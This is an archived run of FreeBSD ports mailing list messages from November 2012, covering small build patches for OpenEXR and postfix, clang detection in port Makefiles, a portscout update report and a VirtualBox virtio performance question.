From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 05:28:06 2012 Return-Path: Delivered-To: freebsd-ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E0FC4460; Sun, 25 Nov 2012 05:28:06 +0000 (UTC) (envelope-from swills@FreeBSD.org) Received: from mouf.net (mouf.net [IPv6:2607:fc50:0:4400:216:3eff:fe69:33b3]) by mx1.freebsd.org (Postfix) with ESMTP id 8D31B8FC12; Sun, 25 Nov 2012 05:28:06 +0000 (UTC) Received: from bender.mouf.net (bender.mouf.net [IPv6:2001:470:8:58f:21c:b3ff:feb5:bf32] (may be forged)) (authenticated bits=0) by mouf.net (8.14.5/8.14.5) with ESMTP id qAP5Ruhd022890 (version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NOT); Sun, 25 Nov 2012 00:28:03 -0500 (EST) (envelope-from swills@FreeBSD.org) Subject: Re: graphics/OpenEXR: patch for gcc46+ Mime-Version: 1.0 (Apple Message framework v1085) Content-Type: text/plain; charset=us-ascii From: Steve Wills In-Reply-To: <50AFEA53.7080203@FreeBSD.org> Date: Sun, 25 Nov 2012 00:28:49 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <016F5D74-D01E-497B-BB9B-5B728E1711DD@FreeBSD.org> References: <50AFEA53.7080203@FreeBSD.org> To: Andriy Gapon X-Mailer: Apple Mail (2.1085) X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (mouf.net [IPv6:2607:fc50:0:4400:216:3eff:fe69:33b3]); Sun, 25 Nov 2012 00:28:03 -0500 (EST) X-Spam-Status: No, score=1.3 required=4.5 tests=RDNS_NONE autolearn=no version=3.3.2 X-Spam-Level: * X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on mouf.net X-Virus-Scanned: clamav-milter 0.97.5 at mouf.net X-Virus-Status: Clean Cc: freebsd-ports@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 05:28:07 -0000 Thanks, I have a plan to update after 9.1 release, I'll try to include = this patch as well. Steve On Nov 23, 2012, at 4:27 PM, Andriy Gapon wrote: > --- exrenvmap/blurImage.cpp.orig 2012-11-23 23:23:48.714449156 = +0200 > +++ exrenvmap/blurImage.cpp 2012-11-23 23:24:09.765447850 +0200 > @@ -45,6 +45,7 @@ > #include "Iex.h" > #include > #include > +#include >=20 > using namespace std; > using namespace Imf; >=20 > This patch is required because memcpy(3) is used in the file. >=20 > --=20 > Andriy Gapon > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to = "freebsd-ports-unsubscribe@freebsd.org" From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 11:49:27 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 68E27305 for ; Sun, 25 Nov 2012 11:49:27 +0000 (UTC) (envelope-from tobias.rehbein@web.de) Received: from mout.web.de (mout.web.de [212.227.15.4]) by mx1.freebsd.org (Postfix) with ESMTP id EB1C88FC08 for ; Sun, 25 Nov 2012 11:49:26 +0000 (UTC) Received: from oshi.local ([62.227.175.108]) by smtp.web.de (mrweb101) with ESMTPSA (Nemesis) id 0LrarZ-1TG0jy34vd-013kyo; Sun, 25 Nov 2012 12:49:19 +0100 Received: from oshi.local (localhost [127.0.0.1]) by oshi.local (8.14.5/8.14.5) with ESMTP id qAPBnJ4f048759; Sun, 25 Nov 2012 12:49:19 +0100 (CET) (envelope-from tobi@oshi.local) Received: (from tobi@localhost) by oshi.local (8.14.5/8.14.5/Submit) id qAPBnINT048752; Sun, 25 Nov 2012 12:49:18 +0100 (CET) (envelope-from tobi) Date: Sun, 25 Nov 2012 12:49:18 +0100 From: Tobias Rehbein To: freebsd-ports@freebsd.org Subject: How to handle WITH_CLANG_IS_CC in ports Message-ID: <20121125114918.GA35966@oshi.local> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.21 (2010-09-15) X-Provags-ID: V02:K0:w2hq6aAQDsILB7LENfAt/QKq85vH53KXXZcHNp6mpOf 0YK719wIMJp9vwBavZdRgNHp4kudTzAQekC73sxe+ANHoNRoGl ExUcTFe23qQvLSqaib1gS62JVt7v2z0WRLnXDTLiptdRnAT5AH azf/IU9kyKKDyppVp9A9WcKyCGA34GW7x6byBfurLh5Yx5YjzL 9UJv8CVwXmTKXFTQ83IfQ== Cc: Nikolai Lifanov X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 11:49:27 -0000 Hi all, I am the maintainer of ganes/stonesoup. This port builds fine with gcc. It also builds with clang, if the MAKE_ARGS are tweaked. Currently I can check for ${CC:T:M*clang*} to know if I have to change the MAKE_ARGS for building with clang or not. In CURRENT cc is clang and the environment variable CC is no longer set. This lets the build of games/stonesoup fail. My question is how to correctly check if cc is clang or not. My first guess was something along the lines of ${CC:T:M*clang*} || (defined(WITH_CLANG_IS_CC) && ${CC:T:Mcc}) but I guess there is some kind of official way to handle this (ideally warpped in some Mk macro. Regards Tobias From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 12:26:59 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 88D9A1AA for ; Sun, 25 Nov 2012 12:26:59 +0000 (UTC) (envelope-from nemysis@gmx.ch) Received: from mailout-de.gmx.net (mailout-de.gmx.net [213.165.64.23]) by mx1.freebsd.org (Postfix) with SMTP id C8EC58FC12 for ; Sun, 25 Nov 2012 12:26:58 +0000 (UTC) Received: (qmail invoked by alias); 25 Nov 2012 12:26:57 -0000 Received: from 201-230.4-85.cust.bluewin.ch (EHLO nemysis3now.no-ip.biz) [85.4.230.201] by mail.gmx.net (mp019) with SMTP; 25 Nov 2012 13:26:57 +0100 X-Authenticated: #134568197 X-Provags-ID: V01U2FsdGVkX19npG0WZPBnFJAh+4tLfc8hijFiX0J/xwgIfpExrF zFHD8Spu9rDjVS Date: Sun, 25 Nov 2012 13:26:56 +0100 From: nemysis To: freebsd-ports@freebsd.org, Steve Wills , Andriy Gapon Subject: Re: graphics/OpenEXR: patch for gcc46+ Message-ID: <20121125132656.331b8924@nemysis3now.no-ip.biz> In-Reply-To: References: X-Mailer: Claws Mail 3.8.1 (GTK+ 2.24.6; amd64-portbld-freebsd9.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Y-GMX-Trusted: 0 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 12:26:59 -0000 On Sun, 25 Nov 2012 12:00:00 +0000 freebsd-ports-request@freebsd.org wrote: > Re: graphics/OpenEXR: patch for gcc46+ This Patch is not needed for new Version graphics/OpenEXR-1.7.1 there is in openexr/openexr-1.7.1/exrenvmap/blurImage.cpp #include #include #include "Iex.h" #include #include #include using namespace std; using namespace Imf; using namespace Imath; On Nov 23, 2012, at 4:27 PM, Andriy Gapon wrote: > --- exrenvmap/blurImage.cpp.orig 2012-11-23 23:23:48.714449156 +0200 > +++ exrenvmap/blurImage.cpp 2012-11-23 23:24:09.765447850 +0200 > @@ -45,6 +45,7 @@ > #include "Iex.h" > #include > #include > +#include > > using namespace std; > using namespace Imf; > > This patch is required because memcpy(3) is used in the file. From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 15:03:35 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 580075D5 for ; Sun, 25 Nov 2012 15:03:35 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id 0F6E48FC14 for ; Sun, 25 Nov 2012 15:03:34 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qAPF3Y38099330 for ; Sun, 25 Nov 2012 10:03:34 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qAPF3YCK099057; Sun, 25 Nov 2012 10:03:34 -0500 (EST) (envelope-from portscout) Message-Id: <201211251503.qAPF3YCK099057@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Sun, 25 Nov 2012 10:03:34 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 15:03:35 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ editors/jedit | 4.5.2 | 5.0.0 ------------------------------------------------+-----------------+------------ graphics/ImageMagick | 6.7.9-4 | 6.8.0-6 ------------------------------------------------+-----------------+------------ graphics/xmedcon | 0.11.1 | 0.12.0 ------------------------------------------------+-----------------+------------ net/liveMedia | 2012.04.04 | 2012.11.22 ------------------------------------------------+-----------------+------------ security/polarssl | 1.1.4 | 1.2.2 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 15:04:39 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 0B1EC710 for ; Sun, 25 Nov 2012 15:04:39 +0000 (UTC) (envelope-from dim@FreeBSD.org) Received: from tensor.andric.com (tensor.andric.com [87.251.56.140]) by mx1.freebsd.org (Postfix) with ESMTP id B7F368FC14 for ; Sun, 25 Nov 2012 15:04:38 +0000 (UTC) Received: from [IPv6:2001:7b8:3a7:0:506f:2496:5d7d:d4f3] (unknown [IPv6:2001:7b8:3a7:0:506f:2496:5d7d:d4f3]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by tensor.andric.com (Postfix) with ESMTPSA id 546A55C59; Sun, 25 Nov 2012 16:04:36 +0100 (CET) Message-ID: <50B23382.3030600@FreeBSD.org> Date: Sun, 25 Nov 2012 16:04:34 +0100 From: Dimitry Andric Organization: The FreeBSD Project User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Tobias Rehbein Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> In-Reply-To: <20121125114918.GA35966@oshi.local> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 15:04:39 -0000 On 2012-11-25 12:49, Tobias Rehbein wrote: > I am the maintainer of ganes/stonesoup. This port builds fine with gcc. > It also builds with clang, if the MAKE_ARGS are tweaked. > > Currently I can check for > > ${CC:T:M*clang*} > > to know if I have to change the MAKE_ARGS for building with clang or > not. > > In CURRENT cc is clang and the environment variable CC is no longer set. > This lets the build of games/stonesoup fail. My question is how to > correctly check if cc is clang or not. My first guess was something > along the lines of > > ${CC:T:M*clang*} || (defined(WITH_CLANG_IS_CC) && ${CC:T:Mcc}) > > but I guess there is some kind of official way to handle this (ideally > warpped in some Mk macro. Just check if OSVERSION >= 1000024, maybe? Or add some logic to bsd.port.mk that handles this, like was done with pkgng. For example, introducing a PORTS_COMPILER_TYPE macro like in base. From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 17:28:21 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 61849E7D for ; Sun, 25 Nov 2012 17:28:21 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vb0-f54.google.com (mail-vb0-f54.google.com [209.85.212.54]) by mx1.freebsd.org (Postfix) with ESMTP id 179328FC13 for ; Sun, 25 Nov 2012 17:28:20 +0000 (UTC) Received: by mail-vb0-f54.google.com with SMTP id l1so2570781vba.13 for ; Sun, 25 Nov 2012 09:28:20 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=EKe0ss5XD+/u7SgNzlOj1ZYvvrGxDttq/LRBQWarlBE=; b=c/MYUAl0uQpkPlBXqoFPgbmQBH2dx9gubMHYQ3lBIqfdD0iy/K4/GvIBCajT+WOn7C V1ZgMOo84j2/Nw/iB0YL6aRi2WBK44gnfcE9o0EZ5bDVzP7eApoADcUYkopAsBcx3Q8N UBe7i1eUj28UD9HEXB95auncjPzf4T5rxjc4zKcaSlYjh/wiNaZc7fF2wfZ9bqb6ZA93 8ePGWuhep2NMnsypP1KYf/nUuQ631kMyVE7UHEnLCg31h5dVLGdGZeJ4nIA1gLj/MA/m Ev06RE3eDzSdaQXAlySPlfrzfIzjCbtw0hMftSqJ/D4uBcExqas2/8QF33dYQnv5oC56 DGiw== MIME-Version: 1.0 Received: by 10.220.107.74 with SMTP id a10mr15298682vcp.20.1353864500094; Sun, 25 Nov 2012 09:28:20 -0800 (PST) Received: by 10.220.230.138 with HTTP; Sun, 25 Nov 2012 09:28:20 -0800 (PST) Date: Sun, 25 Nov 2012 21:28:20 +0400 Message-ID: Subject: multimedia/linux-realplayer marked BROKEN=unfetchable From: awarecons To: ports@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 17:28:21 -0000 but MASTER_SITES= can be changed from unfetchable https://helixcommunity.org/download.php/2479/ to fetchable http://ftp.lip6.fr/pub/linux/distributions/slsoc/5x/i386/i386/SL/ :player \ RealPlayer-10.0.9.809-20070726.i586.rpm From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 20:06:20 2012 Return-Path: Delivered-To: freebsd-ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id C915D902 for ; Sun, 25 Nov 2012 20:06:20 +0000 (UTC) (envelope-from peter@rulingia.com) Received: from vps.rulingia.com (host-122-100-2-194.octopus.com.au [122.100.2.194]) by mx1.freebsd.org (Postfix) with ESMTP id 5AB7C8FC14 for ; Sun, 25 Nov 2012 20:06:19 +0000 (UTC) Received: from server.rulingia.com (c220-239-241-202.belrs5.nsw.optusnet.com.au [220.239.241.202]) by vps.rulingia.com (8.14.5/8.14.5) with ESMTP id qAPK69c3040856 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK); Mon, 26 Nov 2012 07:06:10 +1100 (EST) (envelope-from peter@rulingia.com) X-Bogosity: Ham, spamicity=0.000000 Received: from server.rulingia.com (localhost.rulingia.com [127.0.0.1]) by server.rulingia.com (8.14.5/8.14.5) with ESMTP id qAPK634E015565 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Mon, 26 Nov 2012 07:06:03 +1100 (EST) (envelope-from peter@server.rulingia.com) Received: (from peter@localhost) by server.rulingia.com (8.14.5/8.14.5/Submit) id qAPK60pF015560; Mon, 26 Nov 2012 07:06:00 +1100 (EST) (envelope-from peter) Date: Mon, 26 Nov 2012 07:05:59 +1100 From: Peter Jeremy To: Sahil Tandon Subject: Re: "postfix-current" broken on amd64 platform Message-ID: <20121125200559.GA14753@server.rulingia.com> References: <1321560805.6735.15.camel@hood.oook.cz> <3SkvVw2ZYzzk2RT@spike.porcupine.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ikeVEW9yuYc//A+q" Content-Disposition: inline In-Reply-To: <3SkvVw2ZYzzk2RT@spike.porcupine.org> X-PGP-Key: http://www.rulingia.com/keys/peter.pgp User-Agent: Mutt/1.5.21 (2010-09-15) Cc: freebsd-ports@FreeBSD.org, Wietse Venema X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 20:06:20 -0000 --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Resurrecting an old thread because I've just run into this problem... [postfix dies with a "Protocol not supported" when built in a jail without an IPv6 address] On 2011-Nov-17 15:41:12 -0500, Wietse Venema wrote: >A more proactive workaround would be to treat "protocol not supported" >as a non-fatal error, just like "address family not supported" is. > >Please let me know if this works in the build cluster. It will log >a warning but that should be justfied, because the system does have >an abnormal configuration. > > Wietse > >*** src/util/inet_proto.c- Tue Jan 8 15:36:13 2008 >--- src/util/inet_proto.c Thu Nov 17 08:49:31 2011 >*************** >*** 219,225 **** > pf->dns_atype_list =3D make_unsigned_vector(3, T_A, T_AAAA, 0); > pf->sa_family_list =3D make_uchar_vector(3, AF_INET, AF_INET6, 0); > break; >! } else if (errno =3D=3D EAFNOSUPPORT) { > msg_warn("%s: IPv6 support is disabled: %m", context); > msg_warn("%s: configuring for IPv4 support only", context); > /* FALLTHROUGH */ >--- 219,225 ---- > pf->dns_atype_list =3D make_unsigned_vector(3, T_A, T_AAAA, 0); > pf->sa_family_list =3D make_uchar_vector(3, AF_INET, AF_INET6, 0); > break; >! } else if (errno =3D=3D EAFNOSUPPORT || errno =3D=3D EPROTONOSUPPORT) { > msg_warn("%s: IPv6 support is disabled: %m", context); > msg_warn("%s: configuring for IPv4 support only", context); > /* FALLTHROUGH */ I've just bumped into this exact situation with mail/postfix28 and suspect that earlier postfix ports have the same issue. The above fix works on postfix28 and I would request that it be added to that port's patch list. Since this is a workaround for a FreeBSD-specific issue, I don't believe it's reasonable to expect Wietse to patch old postfix variants to work around it. --=20 Peter Jeremy --ikeVEW9yuYc//A+q Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlCyeicACgkQ/opHv/APuIepfQCgnvo6mPyIrGof5xAvgIlgnVyq rYwAn1FASEr0i6J/QuMbW2BUJ2D320Ib =T5R9 -----END PGP SIGNATURE----- --ikeVEW9yuYc//A+q-- From owner-freebsd-ports@FreeBSD.ORG Sun Nov 25 20:54:18 2012 Return-Path: Delivered-To: freebsd-ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 4AE161FB for ; Sun, 25 Nov 2012 20:54:18 +0000 (UTC) (envelope-from wietse@porcupine.org) Received: from spike.porcupine.org (spike.porcupine.org [168.100.189.2]) by mx1.freebsd.org (Postfix) with ESMTP id 0A2798FC08 for ; Sun, 25 Nov 2012 20:54:17 +0000 (UTC) Received: by spike.porcupine.org (Postfix, from userid 1001) id 3Y8k5G59wyzk2RR; Sun, 25 Nov 2012 15:54:10 -0500 (EST) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=porcupine.org; s=dktest; t=1353876850; bh=j70f9TsyKGrZ/CQb1yNYv1HEXePE8rTZhPLh/3FcrbI=; h=Subject:In-Reply-To:To:Date:Sender:From:CC:MIME-Version: Content-Transfer-Encoding:Content-Type:Message-Id; b=U3GWLEwd7/5f5je+jeEtnIAvMl9o1FFSrc2vvx0/NRLMW4jDZLyRi+slwqYTFwgO8 ADw1I5gRgyYvnf/WVj/t09kO9Js+o1dt8Lhg0Hf2EC/dwGrn42ZqgdCgGuWdPkrKRV 4vbet+WdC4YSicAAOqH1sebVh8ShoqVrkAmuPMtc= Subject: Re: "postfix-current" broken on amd64 platform In-Reply-To: <20121125200559.GA14753@server.rulingia.com> To: Peter Jeremy Date: Sun, 25 Nov 2012 15:54:10 -0500 (EST) Sender: wietse@porcupine.org From: Wietse Venema X-Mailer: ELM [version 2.4ME+ PL124d (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset="US-ASCII" Message-Id: <3Y8k5G59wyzk2RR@spike.porcupine.org> Cc: freebsd-ports@FreeBSD.org, Sahil Tandon , Wietse Venema X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Nov 2012 20:54:18 -0000 Peter Jeremy: > I've just bumped into this exact situation with mail/postfix28 and > suspect that earlier postfix ports have the same issue. The above fix > works on postfix28 and I would request that it be added to that port's > patch list. Since this is a workaround for a FreeBSD-specific issue, > I don't believe it's reasonable to expect Wietse to patch old postfix > variants to work around it. Indeed. I rewrote this module for Postfix 2.9. If it deals with this problem, then I won't take further action. Wietse From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 00:55:37 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CA2BEFC1 for ; Mon, 26 Nov 2012 00:55:37 +0000 (UTC) (envelope-from marek_sal@wp.pl) Received: from mx3.wp.pl (mx3.wp.pl [212.77.101.7]) by mx1.freebsd.org (Postfix) with ESMTP id 488828FC12 for ; Mon, 26 Nov 2012 00:55:36 +0000 (UTC) Received: (wp-smtpd smtp.wp.pl 10426 invoked from network); 26 Nov 2012 01:55:34 +0100 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a; t=1353891335; bh=3gofoOuev7Anf7jYoaHaLnTSOUxs11ncS9Vpfty5voU=; h=From:To:CC:Subject; b=AUIDqflzycXI3GPKv+GBLKsL3IOmaX69vSFh4Rs1n0Q6YtE2kzc9uG/Zo/PT+bjUO VxOWIfEYkFsDeS1cXY5pdgJepWqRSTId/Iqxd4bXKuQVAwGmA7Jxgv+wEVg+s24qTw KV4PUPMRXRxlyjsvZFQ765ojHhSPouxLE6ijBlxQ= Received: from nat.misal.pl (HELO [127.0.0.1]) (marek_sal@[83.19.131.171]) (envelope-sender ) by smtp.wp.pl (WP-SMTPD) with AES256-SHA encrypted SMTP for ; 26 Nov 2012 01:55:34 +0100 Message-ID: <50B2BE05.7090508@wp.pl> Date: Mon, 26 Nov 2012 01:55:33 +0100 From: Marek Salwerowicz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: kuriyama@FreeBSD.org Subject: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121125-1, 2012-11-25), Outbound message X-Antivirus-Status: Clean X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO 0000000 [8UNE] Cc: ports@freebsd.org, emulation@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 00:55:37 -0000 Hi, I would like to test the 'intnet' networking mode in VirtualBox 4.2.4 (under FreeBSD 9.1-PRERELEASE), running 2 VMs with FreeBSD 9.1-RC3 amd64 each. After installing your port kernel detected the 'virtio' interface and I configured the IP on both machines. I used the 'ttcp' program to test the network performance between machines and I noticed that average transfer rate is around 6-7 KB/s (while using eg. the Intel emulator, |82540EM, it's much better, around 100 KB/s) Do you have an idea why this is so slow? And why the if_vtnet network driver isn't provided in GENERIC kernel? Is it still under development? Regards, -- Marek Salwerowicz | From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 01:01:50 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 461E8361 for ; Mon, 26 Nov 2012 01:01:50 +0000 (UTC) (envelope-from marek_sal@wp.pl) Received: from mx4.wp.pl (mx4.wp.pl [212.77.101.8]) by mx1.freebsd.org (Postfix) with ESMTP id B59EE8FC0C for ; Mon, 26 Nov 2012 01:01:49 +0000 (UTC) Received: (wp-smtpd smtp.wp.pl 4919 invoked from network); 26 Nov 2012 02:01:48 +0100 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a; t=1353891708; bh=vR6mRDdzpbkgUoNRVDiDlfAywhUa75wHVOpSzX8mwr8=; h=From:To:CC:Subject; b=q4BzuejZrk4o5xnKdvfWOfcvvvIUMTq+c9PMTMnhWHPuk8sUyPeqMxoMcQPM2jsgp LLLn2/lmFhusAe6/yy3FK77tTPlVeQeHicg63g0rCW32jq1N6mQIXz6NXQeUq6HUaq GgI5sZrj994zaDqgIA4oXmqgtZttDGLAZvRflXjM= Received: from nat.misal.pl (HELO [127.0.0.1]) (marek_sal@[83.19.131.171]) (envelope-sender ) by smtp.wp.pl (WP-SMTPD) with AES256-SHA encrypted SMTP for ; 26 Nov 2012 02:01:48 +0100 Message-ID: <50B2BF7B.6000605@wp.pl> Date: Mon, 26 Nov 2012 02:01:47 +0100 From: Marek Salwerowicz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Marek Salwerowicz Subject: Re: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox References: <50B2BE05.7090508@wp.pl> In-Reply-To: <50B2BE05.7090508@wp.pl> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121125-1, 2012-11-25), Outbound message X-Antivirus-Status: Clean X-WP-DKIM-Status: good (id: wp.pl) X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO 0000000 [ARNE] Cc: ports@freebsd.org, emulation@freebsd.org, kuriyama@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 01:01:50 -0000 W dniu 2012-11-26 01:55, Marek Salwerowicz pisze: > Hi, > > I would like to test the 'intnet' networking mode in VirtualBox 4.2.4 > (under FreeBSD 9.1-PRERELEASE), running 2 VMs with FreeBSD 9.1-RC3 > amd64 each. and 'virtio' NIC type, of course... From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 07:27:29 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 5EFEFAA; Mon, 26 Nov 2012 07:27:29 +0000 (UTC) (envelope-from bryanv@daemoninthecloset.org) Received: from torment.daemoninthecloset.org (ip-94-242-209-234.as5577.net [94.242.209.234]) by mx1.freebsd.org (Postfix) with ESMTP id 0FA998FC08; Mon, 26 Nov 2012 07:27:28 +0000 (UTC) Received: from sage.daemoninthecloset.org (unknown [70.114.196.48]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client CN "sage.daemoninthecloset.org", Issuer "daemoninthecloset.org" (verified OK)) by torment.daemoninthecloset.org (Postfix) with ESMTPS id BAF0342C03E2; Mon, 26 Nov 2012 08:23:01 +0100 (CET) X-Virus-Scanned: amavisd-new at daemoninthecloset.org Received: from sage.daemoninthecloset.org (sage.daemoninthecloset.org [127.0.1.1]) by sage.daemoninthecloset.org (Postfix) with ESMTP id 8DF0473129; Mon, 26 Nov 2012 01:19:17 -0600 (CST) Date: Mon, 26 Nov 2012 01:19:17 -0600 (CST) From: Bryan Venteicher To: Marek Salwerowicz Message-ID: 